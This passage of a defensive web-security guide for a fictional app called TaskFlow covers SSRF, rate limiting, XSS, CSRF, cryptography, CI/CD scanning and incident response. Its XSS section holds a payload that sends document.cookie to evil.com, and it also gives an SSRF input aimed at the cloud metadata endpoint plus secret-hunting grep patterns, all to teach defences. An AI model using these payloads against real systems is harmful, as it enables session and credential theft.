if not user or not verify_password(request.json.get("password"), user.password_hash):
log_security_event("auth.login.failure", email_hash=hashlib.sha256(email.encode()).hexdigest()[:12])
return jsonify({"error": "Invalid credentials"}), 401
log_security_event("auth.login.success", user_id=user.id,
email_hash=hashlib.sha256(email.encode()).hexdigest()[:12])
return jsonify(issue_token_pair(user.id))
A10 — Server-Side Request Forgery (SSRF)
TaskFlow adds a "preview URL" feature. An attacker pastes http://169.254.169.254/latest/meta-data/iam/security-credentials/ — the AWS instance metadata endpoint — and steals IAM credentials.
Important limitation: DNS-based validation alone is vulnerable to TOCTOU attacks (an attacker changes DNS between the check and the fetch). Production SSRF protection requires a dedicated egress proxy with network-level controls. The pattern below is defense-in-depth, not a complete solution.
import ipaddress
import socket
from urllib.parse import urlparse
BLOCKED_NETWORKS = [
ipaddress.ip_network("169.254.0.0/16"), # AWS/GCP metadata service
ipaddress.ip_network("10.0.0.0/8"), # RFC 1918 private
ipaddress.ip_network("172.16.0.0/12"), # RFC 1918 private
ipaddress.ip_network("192.168.0.0/16"), # RFC 1918 private
ipaddress.ip_network("127.0.0.0/8"), # Loopback
]
def is_safe_url(url: str) -> bool:
try:
parsed = urlparse(url)
if parsed.scheme not in {"http", "https"}:
return False
if not parsed.hostname:
return False
# Resolve hostname and check against blocked networks.
# WARNING: DNS TOCTOU — attacker can return a safe IP here, then switch
# DNS to an internal address before the actual httpx.get() below.
# True protection requires a dedicated egress proxy with network-level controls.
ip = ipaddress.ip_address(socket.gethostbyname(parsed.hostname))
return not any(ip in net for net in BLOCKED_NETWORKS)
except Exception:
return False
@app.route("/preview", methods=["POST"])
def preview_url():
url = request.json.get("url", "")
if not is_safe_url(url):
return jsonify({"error": "URL not allowed"}), 400
# Use dedicated outbound proxy with no internal network access
response = httpx.get(url, timeout=5.0, follow_redirects=False)
return jsonify({"title": extract_og_title(response.text)})
9. API Security
TaskFlow opens a public API. Within a week, a poorly-written integration hammers it with 10,000 requests per minute and another developer exploits missing input validation to insert malformed data. API security isn't optional for public-facing APIs.
See also: REST API Refresher for API design patterns.
Rate Limiting
// Sliding window rate limiter middleware (Go + Redis)
type RateLimiter struct {
rdb *redis.Client
limit int
window time.Duration
}
func (rl *RateLimiter) Middleware(next http.Handler) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
key := rateLimitKey(r)
ctx := r.Context()
now := time.Now()
windowStart := now.Add(-rl.window)
pipe := rl.rdb.Pipeline()
pipe.ZRemRangeByScore(ctx, key, "0", strconv.FormatInt(windowStart.UnixMicro(), 10))
pipe.ZAdd(ctx, key, redis.Z{Score: float64(now.UnixMicro()), Member: now.UnixMicro()})
pipe.ZCard(ctx, key)
pipe.Expire(ctx, key, rl.window)
results, _ := pipe.Exec(ctx)
count := results[2].(*redis.IntCmd).Val()
remaining := int64(rl.limit) - count
w.Header().Set("X-RateLimit-Limit", strconv.Itoa(rl.limit))
w.Header().Set("X-RateLimit-Remaining", strconv.FormatInt(max(remaining, 0), 10))
if count > int64(rl.limit) {
w.Header().Set("Retry-After", strconv.Itoa(int(rl.window.Seconds())))
http.Error(w, `{"error":"rate limit exceeded"}`, http.StatusTooManyRequests)
return
}
next.ServeHTTP(w, r)
})
}
func rateLimitKey(r *http.Request) string {
if userID := getUserIDFromContext(r.Context()); userID != "" {
return "rl:user:" + userID
}
return "rl:ip:" + getClientIP(r)
}
Input Validation at the Boundary
from pydantic import BaseModel, Field, field_validator
from typing import Optional
class CreateTaskRequest(BaseModel):
title: str = Field(min_length=1, max_length=500)
description: Optional[str] = Field(None, max_length=10000)
priority: str = Field(pattern="^(low|medium|high|urgent)$")
due_date: Optional[str] = None
@field_validator("title")
@classmethod
def sanitize_title(cls, v: str) -> str:
v = v.strip()
if not v:
raise ValueError("Title cannot be empty")
return v
@field_validator("due_date")
@classmethod
def validate_date(cls, v: Optional[str]) -> Optional[str]:
if v is not None:
try:
datetime.fromisoformat(v)
except ValueError:
raise ValueError("due_date must be ISO 8601 (YYYY-MM-DD)")
return v
@app.route("/tasks", methods=["POST"])
@require_auth
def create_task():
try:
body = CreateTaskRequest.model_validate(request.get_json())
except ValidationError as e:
return jsonify({"error": "Validation failed", "details": e.errors()}), 422
task = db.tasks.create(**body.model_dump(), creator_id=get_current_user_id())
return jsonify(task_to_dict(task)), 201
CORS Configuration
func CORSMiddleware(allowedOrigins []string) func(http.Handler) http.Handler {
allowed := make(map[string]bool)
for _, o := range allowedOrigins {
allowed[o] = true
}
return func(next http.Handler) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
origin := r.Header.Get("Origin")
if allowed[origin] {
w.Header().Set("Access-Control-Allow-Origin", origin) // Not *
w.Header().Set("Access-Control-Allow-Credentials", "true")
w.Header().Set("Vary", "Origin")
}
if r.Method == http.MethodOptions {
w.Header().Set("Access-Control-Allow-Methods", "GET,POST,PUT,PATCH,DELETE")
w.Header().Set("Access-Control-Allow-Headers", "Content-Type,Authorization")
w.Header().Set("Access-Control-Max-Age", "3600")
w.WriteHeader(http.StatusNoContent)
return
}
next.ServeHTTP(w, r)
})
}
}
Webhook Signature Verification
import hmac, hashlib
def verify_webhook(payload: bytes, signature: str, secret: str) -> bool:
expected = "sha256=" + hmac.new(
secret.encode(), payload, hashlib.sha256
).hexdigest()
return hmac.compare_digest(expected, signature) # Constant-time comparison
# Production webhook verification should also validate timestamps:
# 1. Parse timestamp from header (e.g., Stripe: "t=TIMESTAMP,v1=SIGNATURE")
# 2. Reject if abs(now - timestamp) > 300 seconds (replay protection)
# 3. Include timestamp in HMAC computation
# For Stripe specifically, use: stripe.Webhook.construct_event(payload, sig, secret)
@app.route("/webhooks/stripe", methods=["POST"])
def stripe_webhook():
payload = request.get_data() # Raw bytes before JSON parsing
sig = request.headers.get("Stripe-Signature", "")
if not verify_webhook(payload, sig, os.environ["STRIPE_WEBHOOK_SECRET"]):
return jsonify({"error": "Invalid signature"}), 401
handle_stripe_event(json.loads(payload))
return jsonify({"ok": True})
10. Threat Modeling with STRIDE
Before building TaskFlow's payment feature, the tech lead calls a 30-minute threat modeling session. The goal isn't a perfect threat model — it's finding the big risks before writing code, not after a breach.
Step 1 — Draw the Data Flow Diagram
Step 2 — Apply STRIDE to Each Component
STRIDE is a mnemonic for threat categories. For each element in the data flow diagram, ask which STRIDE threats apply:
| Letter | Threat | Question to ask |
|---|---|---|
| S | Spoofing | Can an attacker impersonate a user or service? |
| T | Tampering | Can an attacker modify data in transit or at rest? |
| R | Repudiation | Can a user deny taking an action? |
| I | Information Disclosure | Can an attacker read data they shouldn't? |
| D | Denial of Service | Can an attacker make the system unavailable? |
| E | Elevation of Privilege | Can an attacker gain more permissions than intended? |
STRIDE Applied to TaskFlow Payment API
| Component | Threat | Attack scenario | Mitigation |
|---|---|---|---|
| API endpoint | Spoofing | Attacker sends request with forged user_id in body | Derive user identity from verified JWT, never request body |
| API endpoint | Tampering | Attacker modifies amount in flight | TLS in transit; re-derive amount from DB, not request |
| API endpoint | DoS | Bot floods payment endpoint | Rate limiting (3 per hour per user) + Cloudflare |
| Payment DB | Info Disclosure | SQL injection exposes card data | Parameterized queries; store only Stripe token, never card number |
| Payment DB | Elevation | App DB user can DROP tables | Least-privilege DB role (SELECT/INSERT/UPDATE only) |
| Audit log | Repudiation | User denies charge; no audit trail | Append-only WORM S3 bucket; log every payment attempt with user_id and IP |
| Stripe integration | Tampering | Webhook replay or forgery | Verify Stripe-Signature HMAC on every webhook |
Step 3 — Rank and Mitigate
Score each threat by likelihood × impact. Address critical ones before shipping, log the rest as accepted risk. The output isn't a 50-page document — it's a ranked list of mitigations added to the sprint backlog.
11. Secrets Management
TaskFlow has accumulated 15 environment variables: database URL, Stripe keys, JWT secret, Sendgrid API key, Google OAuth credentials, Redis URL, Slack webhook, internal service tokens. Managing secrets incorrectly is how companies make headlines.
Maturity Levels
| Level | Approach | Appropriate for | Risk |
|---|---|---|---|
| 0 | Hardcoded in source | Never | Critical — in every git clone forever |
| 1 | .env files | Local dev only, never committed | High if committed; check .gitignore |
| 2 | Platform env vars (Railway, Heroku, Vercel) | Simple deployments | Medium — visible to all platform users on the project |
| 3 | Secrets manager (Vault, AWS SM, GCP SM) | Production, compliance | Low — audit log, rotation, fine-grained access |
# Reading secrets from AWS Secrets Manager (production pattern)
import boto3
import json
from functools import lru_cache
# WARNING: lru_cache has no TTL — cached secrets never refresh.
# For production with secret rotation, use a TTL cache:
# from cachetools import TTLCache
# _cache = TTLCache(maxsize=100, ttl=300) # 5-minute TTL
@lru_cache(maxsize=None)
def get_secret(secret_name: str) -> dict:
"""Fetch and cache secret for process lifetime."""
client = boto3.client("secretsmanager", region_name="us-east-1")
response = client.get_secret_value(SecretId=secret_name)
return json.loads(response["SecretString"])
# Usage — never hardcode the secret value
db_creds = get_secret("taskflow/prod/database")
DB_URL = f"postgresql://{db_creds['username']}:{db_creds['password']}@{db_creds['host']}/{db_creds['dbname']}"
Secret Rotation — Zero Downtime
The dual-credential pattern ensures rotation never causes downtime:
Common Disasters
- Secrets in git history —
git log -p | grep -i secretreveals them forever. Usegit-secretspre-commit hook. Rotate immediately if leaked. - Secrets in error logs — Logging request headers exposes
Authorization: Bearer ...tokens. Scrub headers before logging. - Secrets in Docker images —
RUN pip install -r requirements.txt --extra-index-url https://user:[email protected]bakes the token into the image layer. Use build secrets (--secretflag) instead. - Secrets in environment variable dumps — Never call
/actuator/envor equivalent in production without auth. These endpoints expose all env vars.
# Check for secrets accidentally committed to git
git log --all -p | grep -iE "(password|secret|api_key|token)\s*=\s*['\"][^'\"]{8,}"
# Install git-secrets pre-commit hook
brew install git-secrets
git secrets --install
git secrets --register-aws # Also add your own patterns
# Revoke and rotate if you find anything — then rewrite history
git filter-repo --path .env --invert-paths # Remove file from all history
# Then force-push and notify all collaborators to re-clone
12. TLS & Certificates
TaskFlow's infrastructure team asks: "Is our traffic really encrypted end-to-end?" The answer is complicated. Cloudflare terminates TLS. The connection from Cloudflare to Railway is a separate TLS session. The inter-service calls inside the cluster — are those encrypted?
See also: Networking Refresher for a deeper TCP/IP treatment.
TLS 1.3 Handshake — What Happens
Certificate Chain
Let's Encrypt and Auto-Renewal
# Certbot: obtain and auto-renew Let's Encrypt certificate
certbot certonly \
--webroot \
-w /var/www/html \
-d taskflow.app \
-d www.taskflow.app \
--email [email protected] \
--agree-tos \
--non-interactive
# Auto-renewal via cron (certbot renews certs expiring within 30 days)
0 0 * * * certbot renew --quiet --post-hook "nginx -s reload"
# Verify your certificate chain
openssl s_client -connect taskflow.app:443 -servername taskflow.app </dev/null | \
openssl x509 -noout -dates -subject -issuer
# Check expiry programmatically (alert if < 30 days)
EXPIRY=$(echo | openssl s_client -servername taskflow.app -connect taskflow.app:443 2>/dev/null | \
openssl x509 -noout -enddate | cut -d= -f2)
echo "Certificate expires: $EXPIRY"
Security Headers
// Go: security headers middleware
func SecurityHeaders(next http.Handler) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
h := w.Header()
// Force HTTPS for 1 year, include subdomains, preload
h.Set("Strict-Transport-Security", "max-age=31536000; includeSubDomains; preload")
// Prevent MIME sniffing
h.Set("X-Content-Type-Options", "nosniff")
// Prevent clickjacking
h.Set("X-Frame-Options", "DENY")
// Restrict referrer info
h.Set("Referrer-Policy", "strict-origin-when-cross-origin")
// Content Security Policy (start restrictive, loosen as needed)
// Generate a per-request nonce and substitute it into the CSP header.
// The {NONCE} placeholder below is NOT sent to clients — replace it
// in your template middleware before writing the response:
// nonce := base64.StdEncoding.EncodeToString(randomBytes(16))
// csp := strings.Replace(cspTemplate, "{NONCE}", nonce, -1)
h.Set("Content-Security-Policy",
"default-src 'self'; "+
"script-src 'self' 'nonce-{NONCE}'; "+
"style-src 'self' 'unsafe-inline' fonts.googleapis.com; "+
"font-src fonts.gstatic.com; "+
"img-src 'self' data: https:; "+
"connect-src 'self' https://api.taskflow.app; "+
"frame-ancestors 'none'")
next.ServeHTTP(w, r)
})
}
mTLS — Mutual TLS
Standard TLS: server proves identity to client. mTLS: both sides prove identity. Used for service-to-service authentication where you want to ensure only your own services can call each other.
# Generate client certificate for internal service auth
# For internal service certs, prefer ECDSA P-256 (faster, smaller):
# openssl ecparam -genkey -name prime256v1 -out service-a.key
# Use short lifetimes (30-90 days) with automated rotation
openssl genrsa -out service-a.key 4096 # RSA alternative
openssl req -new -key service-a.key -out service-a.csr \
-subj "/CN=service-a/O=TaskFlow/OU=Internal"
openssl x509 -req -in service-a.csr -CA internal-ca.crt -CAkey internal-ca.key \
-CAcreateserial -out service-a.crt -days 90
# Go client: present client certificate
cert, _ := tls.LoadX509KeyPair("service-a.crt", "service-a.key")
caCert, _ := os.ReadFile("internal-ca.crt")
caCertPool := x509.NewCertPool()
caCertPool.AppendCertsFromPEM(caCert)
client := &http.Client{
Transport: &http.Transport{
TLSClientConfig: &tls.Config{
Certificates: []tls.Certificate{cert},
RootCAs: caCertPool,
},
},
}
13. Browser Security
TaskFlow's React frontend gets a bug report: a user's account is posting tasks they never created. The culprit is stored XSS — a task title containing a script tag was rendered without sanitization, and the script exfiltrated the user's auth token.
Same-Origin Policy
The browser's foundational security model: a script from https://taskflow.app can read responses from https://taskflow.app but not from https://evil.com. Origin = scheme + hostname + port. Any difference means cross-origin.
XSS — Three Types
| Type | Where payload lives | Who gets hit |
|---|---|---|
| Stored XSS | Database (task title, comment) | Every user who views the page |
| Reflected XSS | URL parameter, search query | Anyone who clicks the crafted URL |
| DOM-based XSS | Client-side JS reads URL hash/params | Anyone who visits the crafted URL |
// DOM-based XSS example
// URL: https://taskflow.app/search#<img src=x onerror="fetch('https://evil.com?c='+document.cookie)">
const query = location.hash.slice(1);
document.getElementById('search').innerHTML = `Search: ${query}`; // VULNERABLE
// Fixed: use textContent or sanitize
document.getElementById('search').textContent = `Search: ${decodeURIComponent(query)}`;
Content Security Policy
CSP instructs the browser which sources are allowed for scripts, styles, images, etc. A strong CSP severely limits what stolen XSS can do.
## Progressive CSP deployment
## Phase 1: Report-only (learn without breaking anything)
Content-Security-Policy-Report-Only: default-src 'self'; report-uri /csp-reports
## Phase 2: Enforce with nonces (allows inline scripts you control)
Content-Security-Policy:
default-src 'self';
script-src 'self' 'nonce-RANDOM_PER_REQUEST';
style-src 'self' 'unsafe-inline';
img-src 'self' data: https:;
connect-src 'self' https://api.taskflow.app;
font-src 'self' fonts.gstatic.com;
frame-ancestors 'none';
base-uri 'self';
form-action 'self'
# Server-side: generate nonce per request
import secrets, base64
@app.before_request
def generate_csp_nonce():
g.csp_nonce = base64.b64encode(secrets.token_bytes(16)).decode()
@app.after_request
def add_csp_header(response):
response.headers["Content-Security-Policy"] = (
f"default-src 'self'; "
f"script-src 'self' 'nonce-{g.csp_nonce}'; "
"style-src 'self' 'unsafe-inline'; "
"frame-ancestors 'none'"
)
return response
CSRF and SameSite Cookies
# CSRF: attacker hosts evil.com with:
# <form action="https://taskflow.app/tasks/delete/42" method="POST">
# If TaskFlow uses session cookies without SameSite, the browser sends them!
# FIXED: SameSite=Strict or Lax prevents cross-site cookie sending
resp.set_cookie(
"sid",
session_id,
httponly=True,
secure=True,
samesite="Strict", # Never sent on cross-site requests
# Or "Lax" — sent on top-level navigations but not subresource requests
)
Clickjacking and Subresource Integrity
<!-- Clickjacking: attacker iframes your site over a deceptive UI -->
<!-- Fix: X-Frame-Options: DENY or CSP frame-ancestors 'none' -->
<!-- Subresource Integrity: verify CDN scripts haven't been tampered with -->
<script
src="https://cdn.example.com/jquery-3.7.1.min.js"
integrity="sha384-1H217gwSVyLSIfaLxHbE7dRb3v4mYCKbpQvzx0cegeju1MVsGrX5xXxAvs/HgeFs"
crossorigin="anonymous"></script>
<!-- Generate integrity hash -->
<!-- openssl dgst -sha384 -binary jquery.min.js | openssl base64 -A -->
14. Cryptography Essentials
TaskFlow needs to store passwords, sign tokens, and encrypt sensitive task attachments. The golden rule of applied cryptography: don't implement algorithms yourself, use battle-tested libraries. But you do need to choose the right algorithm for each use case.
Password Hashing — Never SHA-256
SHA-256 is a general-purpose hash — fast by design. An attacker with a GPU can compute billions of SHA-256 hashes per second. Password hashing algorithms are intentionally slow and memory-hard, making brute force infeasible.
| Algorithm | Memory-hard | Recommended work factor | Use |
|---|---|---|---|
| bcrypt | No | rounds=12 (~250ms) | Default choice, widely supported |
| scrypt | Yes | N=32768, r=8, p=1 | Better GPU resistance |
| argon2id | Yes | m=65536, t=3, p=4 | Best current choice (OWASP recommendation) |
from argon2 import PasswordHasher
from argon2.exceptions import VerifyMismatchError
ph = PasswordHasher(
time_cost=3, # Number of iterations
memory_cost=65536, # 64 MB
parallelism=4,
hash_len=32,
salt_len=16,
)
def hash_password(password: str) -> str:
return ph.hash(password)
def verify_password(password: str, stored_hash: str) -> bool:
try:
ph.verify(stored_hash, password)
# Re-hash if parameters changed (transparent upgrade)
if ph.check_needs_rehash(stored_hash):
new_hash = ph.hash(password)
db.users.update_password_hash(new_hash)
return True
except VerifyMismatchError:
return False
Symmetric Encryption — AES-256-GCM
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
import os
def encrypt_data(plaintext: bytes, key: bytes) -> bytes:
"""Encrypt with AES-256-GCM. Returns nonce + ciphertext + tag."""
nonce = os.urandom(12) # 96-bit nonce, unique per encryption
aesgcm = AESGCM(key) # key must be 32 bytes for AES-256
ciphertext = aesgcm.encrypt(nonce, plaintext, associated_data=None)
return nonce + ciphertext # Prepend nonce for storage
def decrypt_data(blob: bytes, key: bytes) -> bytes:
"""Decrypt. Raises InvalidTag if tampered."""
nonce = blob[:12]
ciphertext = blob[12:]
aesgcm = AESGCM(key)
return aesgcm.decrypt(nonce, ciphertext, associated_data=None)
# GCM mode provides authentication — detects tampering automatically
# Derive encryption key from master secret using HKDF
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
from cryptography.hazmat.primitives import hashes
def derive_key(master_secret: bytes, context: str) -> bytes:
hkdf = HKDF(
algorithm=hashes.SHA256(),
length=32,
salt=b"taskflow-key-derivation-v1", # Fixed application salt
info=context.encode(),
)
return hkdf.derive(master_secret)
# Usage
master = os.environ["MASTER_ENCRYPTION_KEY"].encode()
attachment_key = derive_key(master, "taskflow/attachments/v1")
encrypted = encrypt_data(file_bytes, attachment_key)
Asymmetric — RSA vs ECDSA
| Algorithm | Key sizes (comparable security) | Use case |
|---|---|---|
| RSA-2048 | 2048 bits | TLS, JWT RS256, widely compatible |
| RSA-4096 | 4096 bits | Long-term signing, code signing |
| ECDSA P-256 | 256 bits (equivalent to RSA-3072) | JWT ES256, TLS — smaller keys, faster |
| Ed25519 | 256 bits | SSH keys, modern signing — fastest, smallest |
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
from cryptography.hazmat.primitives.serialization import (
Encoding, PublicFormat, PrivateFormat, NoEncryption
)
# Generate Ed25519 key pair for signing webhooks
private_key = Ed25519PrivateKey.generate()
public_key = private_key.public_key()
# Sign a message
signature = private_key.sign(message_bytes)
# Verify (recipients only need public key)
try:
public_key.verify(signature, message_bytes)
print("Signature valid")
except Exception:
print("Signature invalid or tampered")
15. Security in CI/CD
TaskFlow's CI/CD pipeline runs tests, builds Docker images, and deploys to production on every merge to main. The pipeline is privileged — it has cloud credentials, database access, and the ability to push container images. An attacker who compromises the pipeline has compromised everything.
Dependency Scanning
# .github/workflows/security.yml
name: Security Scan
on: [push, pull_request]
jobs:
scan:
runs-on: ubuntu-latest
permissions:
security-events: write # Required for SARIF upload
contents: read
steps:
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
# Python dependency audit
- name: pip-audit
run: |
pip install pip-audit
pip-audit --strict --output=json > pip-audit-results.json || true
# Node dependency audit
- name: npm audit
run: npm audit --audit-level=high --json > npm-audit-results.json || true
# Trivy: filesystem scan for all ecosystems
- name: Trivy filesystem scan
uses: aquasecurity/trivy-action@a20de5420d57c4102486cdd9349b532415aa020d
with:
scan-type: fs
scan-ref: .
exit-code: 1
severity: CRITICAL,HIGH
format: sarif
output: trivy-results.sarif
# Container image scan
- name: Trivy image scan
uses: aquasecurity/trivy-action@a20de5420d57c4102486cdd9349b532415aa020d
with:
image-ref: ghcr.io/taskflow/api:${{ github.sha }}
exit-code: 1
severity: CRITICAL
SAST — Static Analysis
# Semgrep: SAST rules for common vulnerabilities
- name: Semgrep
uses: semgrep/semgrep-action@v1
with:
config: |
p/python
p/django
p/jwt
p/secrets
auditOn: push
# CodeQL: GitHub's SAST (deeper analysis, slower)
- name: Initialize CodeQL
uses: github/codeql-action/init@v3
with:
languages: python, javascript
- name: Perform CodeQL Analysis
uses: github/codeql-action/analyze@v3
with:
category: "/language:python"
Secret Scanning
# Pre-commit hook to block secrets from being committed
pip install detect-secrets
detect-secrets scan > .secrets.baseline
# Add to .pre-commit-config.yaml:
# - repo: https://github.com/Yelp/detect-secrets
# hooks:
# - id: detect-secrets
# args: ['--baseline', '.secrets.baseline']
# Gitleaks: scan repo history for secrets
docker run --rm -v $(pwd):/repo \
zricethezav/gitleaks:latest detect \
--source=/repo \
--report-format=json \
--report-path=/repo/gitleaks-report.json
# If secrets are found in history, rotate immediately, then:
git filter-repo --path .env --invert-paths --force
Supply Chain Security
# Pin ALL action versions to commit SHAs, not tags
# Tags are mutable — an attacker who compromises the action repo can move a tag
# Generate SLSA provenance for artifacts
- name: Build and push with provenance
uses: docker/build-push-action@48aba3b46d1b1fec4febb7c5d0c644b249a11355
with:
push: true
tags: ghcr.io/taskflow/api:${{ github.sha }}
provenance: true # SLSA Level 1 — generates provenance attestation
sbom: true # Software Bill of Materials
16. Security Audit Walkthrough
TaskFlow is raising a Series A. The investors require a security audit. The CTO asks: "What should we review before bringing in the external auditors?"
Authentication
| Check | Severity if missing |
|---|---|
| Passwords hashed with bcrypt/argon2 (not MD5/SHA) | Critical |
| Brute-force protection on login and password reset | High |
| MFA available (TOTP or passkeys) | High |
| Session invalidated on logout | High |
| JWT algorithm explicitly validated (not "any") | Critical |
| Refresh token rotation on use | High |
| Magic link tokens single-use with TTL | High |
Authorization
| Check | Severity if missing |
|---|---|
| Every endpoint checks authorization (not just authentication) | Critical |
| No IDOR — resource IDs scoped to authenticated user context | Critical |
| Admin endpoints require separate elevated role check | Critical |
| Authorization enforced server-side (not only in frontend) | Critical |
| Horizontal privilege escalation tested | Critical |
Data
| Check | Severity if missing |
|---|---|
| All DB queries parameterized (no string interpolation) | Critical |
| PII encrypted at rest | High |
| Database backups encrypted | High |
| DB user has least-privilege (not superuser) | High |
| No PII in log files or error messages | High |
| Sensitive API response fields explicitly excluded | High |
Infrastructure
| Check | Severity if missing |
|---|---|
| HTTPS enforced everywhere (HSTS header) | Critical |
| Secrets in secrets manager, not plain env vars in code | High |
| No secrets in git history | Critical |
| CI/CD actions pinned to SHA | Medium |
| Container images scanned for CVEs | High |
| Security headers present (CSP, HSTS, X-Frame-Options) | Medium |
| Rate limiting on public endpoints | High |
17. Incident Response
3 AM. An alert fires: unusual API activity — one user_id querying thousands of tasks across dozens of workspaces. You wake up to a Slack message. What do you do in the next 30 minutes?
Incident Response Phases
First 30 Minutes — Containment
# Step 1: Identify the suspicious activity
# Check API logs for the pattern
grep "user_id=suspicious_id" /var/log/api/access.log | \
awk '{print $1, $7, $9}' | sort | head -50
# Step 2: Revoke all active sessions for compromised user
# (depends on your session store)
redis-cli SCAN 0 MATCH "session:*" COUNT 1000 | \
xargs -I {} redis-cli HGET {} user_id | \
grep "compromised_user_id" | \
xargs redis-cli DEL
# Step 3: Rotate compromised credentials
# If API key was leaked:
db.api_keys.revoke(leaked_key_id)
# If JWT secret may be compromised:
# Change JWT_SECRET — this invalidates ALL tokens for ALL users
# (nuclear option — only if necessary)
# Step 4: Check what was accessed
SELECT target_resource, COUNT(*), MIN(ts), MAX(ts)
FROM audit_log
WHERE actor_id = 'compromised_user'
AND ts > NOW() - INTERVAL '24 hours'
GROUP BY target_resource
ORDER BY COUNT(*) DESC;
# Step 5: Assess blast radius — did they access other users' data?
SELECT DISTINCT workspace_id
FROM audit_log
WHERE actor_id = 'compromised_user'
AND event = 'task.viewed';
JWT Revocation — The Hard Problem
JWTs are stateless — you can't "delete" a token. If a user's JWT is stolen, it's valid until expiry. Options:
| Approach | How it works | Trade-off |
|---|---|---|
| Short expiry (15 min) | Token naturally expires quickly | Requires frequent refresh; still 15-min window |
| Token blocklist | Store revoked JTI (JWT ID) in Redis; check on every request | Loses statelessness benefit; Redis lookup per request |
| Rotate secret | Change signing secret; invalidates all tokens | Logs out all users simultaneously |
| Version in token | Store token_version per user in DB; increment to invalidate | One DB lookup per request; graceful invalidation |
# Token version pattern — graceful per-user revocation
def verify_access_token(token: str) -> dict:
payload = jwt.decode(
token,
SECRET_KEY,
algorithms=["HS256"],
options={"require": ["exp", "sub", "iss"]},
issuer="https://taskflow.app",
)
# Check token version against DB (cached in Redis with short TTL)
user_version = redis.get(f"token_version:{payload['sub']}")
if user_version is None:
user_version = db.users.get_token_version(payload["sub"])
redis.setex(f"token_version:{payload['sub']}", 60, user_version)
if int(payload.get("ver", 0)) < int(user_version):
raise AuthError("Token revoked")
return payload
def revoke_user_tokens(user_id: str):
"""Invalidate all tokens for a user by incrementing their version."""
new_version = db.users.increment_token_version(user_id)
redis.setex(f"token_version:{user_id}", 60, new_version)
GDPR 72-Hour Notification
Under GDPR, if a breach affects EU residents' personal data, you must notify your supervisory authority within 72 hours of becoming aware of it. Your incident response plan must include:
- Who is the Data Protection Officer (or responsible person)?
- Which data was affected? (categories, approximate number of individuals)
- What is the likely consequence of the breach?
- What measures have you taken to address it?
Postmortem Template
## Incident Postmortem: [Incident Title]
**Date:** 2026-03-18
**Severity:** P1 (Critical)
**Duration:** 4 hours
**Lead:** [Name]
### Timeline
- 03:14 — Alert fired: anomalous API activity
- 03:22 — On-call engineer paged and began investigation
- 03:45 — Compromised token identified and revoked
- 05:30 — Root cause identified: stolen refresh token via phishing
- 07:15 — Remediation deployed; monitoring confirmed clean
### Impact
- 1 user account compromised
- 23 workspace records read (not exfiltrated)
- No data modified or deleted
### Root Cause
Refresh token not invalidated on logout. User had logged out but token remained valid for 30 days.
### Contributing Factors
- No alert on geographic anomaly (login from new country)
- Refresh token TTL was 30 days (too long)
### Action Items
| Action | Owner | Due |
|--------|-------|-----|
| Revoke refresh tokens on logout | @backend-team | 2026-03-20 |
| Add geographic anomaly detection | @security | 2026-03-25 |
| Reduce refresh token TTL to 7 days | @backend-team | 2026-03-20 |
| Add test for logout token revocation | @backend-team | 2026-03-20 |
### What Went Well
- Alert fired quickly
- Runbook was available and followed
- Blast radius was limited due to audit logging
18. Security Decision Matrix
When building any new feature, use this matrix as a checklist. Not all concerns apply to every feature, but for each that does, there's a concrete action.
| Feature characteristic | Security concerns to address |
|---|---|
| Handles user input | Input validation (Pydantic/JSON Schema), output encoding, parameterized queries, file type validation |
| Stores sensitive data | Encryption at rest (AES-256-GCM), key management, retention policy, GDPR consent |
| Has authentication | Brute-force protection, MFA support, credential breach check, session management |
| Exposes an API endpoint | Authentication required, authorization checked, rate limiting, input validation, CORS policy |
| Fetches external URLs | SSRF prevention (allowlist or IP validation), timeout, redirect limit |
| Processes payments | PCI-DSS scope reduction (use Stripe tokens, never raw card data), audit logging, idempotency keys |
| Handles PII | GDPR/CCPA compliance, data minimization, retention limits, no PII in logs, right to deletion |
| Uses third-party services | Secrets in vault (not hardcoded), rotation plan, webhook signature verification, vendor security review |
| Has admin functions | Elevated role check, audit logging, MFA enforcement for admins, IP allowlisting |
| Sends emails or notifications | No sensitive data in subject, rate limit to prevent abuse, SPF/DKIM/DMARC configured |
| Uses CI/CD pipeline | Pin action SHAs, secret scanning, dependency scanning, SAST, least-privilege service account |
| New service or microservice | mTLS or service mesh, secrets injection, no default credentials, threat model the data flows |
Quick Reference — Algorithm Choices
| Use case | Recommended | Avoid |
|---|---|---|
| Password storage | argon2id, bcrypt (rounds=12) | MD5, SHA-1, SHA-256, unsalted |
| Token signing (shared secret) | HS256, HS512 | alg:none, weak secrets |
| Token signing (public/private) | ES256 (ECDSA), RS256 | RSA-1024 |
| Symmetric encryption | AES-256-GCM | AES-ECB, DES, RC4 |
| Data integrity (non-password) | SHA-256, SHA-3 | MD5, SHA-1 (collision risk) |
| Key derivation | HKDF, argon2id (for passwords) | Direct truncation, SHA-256 alone |
| TLS version | TLS 1.3, TLS 1.2 | TLS 1.0, TLS 1.1, SSL |
| SSH keys | Ed25519 | RSA-1024, DSA |
Security Tooling Landscape
| Category | Tool | What it finds |
|---|---|---|
| SAST | Semgrep, CodeQL, Bandit (Python) | Injection, hardcoded secrets, insecure patterns |
| DAST | OWASP ZAP, Burp Suite | XSS, injection, auth flaws at runtime |
| Dependency | Trivy, Snyk, npm audit, pip-audit | Known CVEs in dependencies |
| Secret scanning | detect-secrets, gitleaks, GitHub Advanced Security | Secrets in code and history |
| Container | Trivy, Grype, Clair | CVEs in base images and packages |
| Infrastructure | tfsec, Checkov, Prowler | Terraform/CloudFormation misconfigurations |
- OWASP — owasp.org/Top10 and the Testing Guide (comprehensive manual testing methodology)
- PortSwigger Web Security Academy — Free, hands-on labs for every vulnerability class
- HackTricks — Attacker perspective on every vulnerability
- Google BeyondCorp — Zero trust architecture reference
- REST API Refresher — API design including security patterns
- Networking Refresher — TLS, DNS, HTTP details
- Spring Boot Refresher — Spring Security integration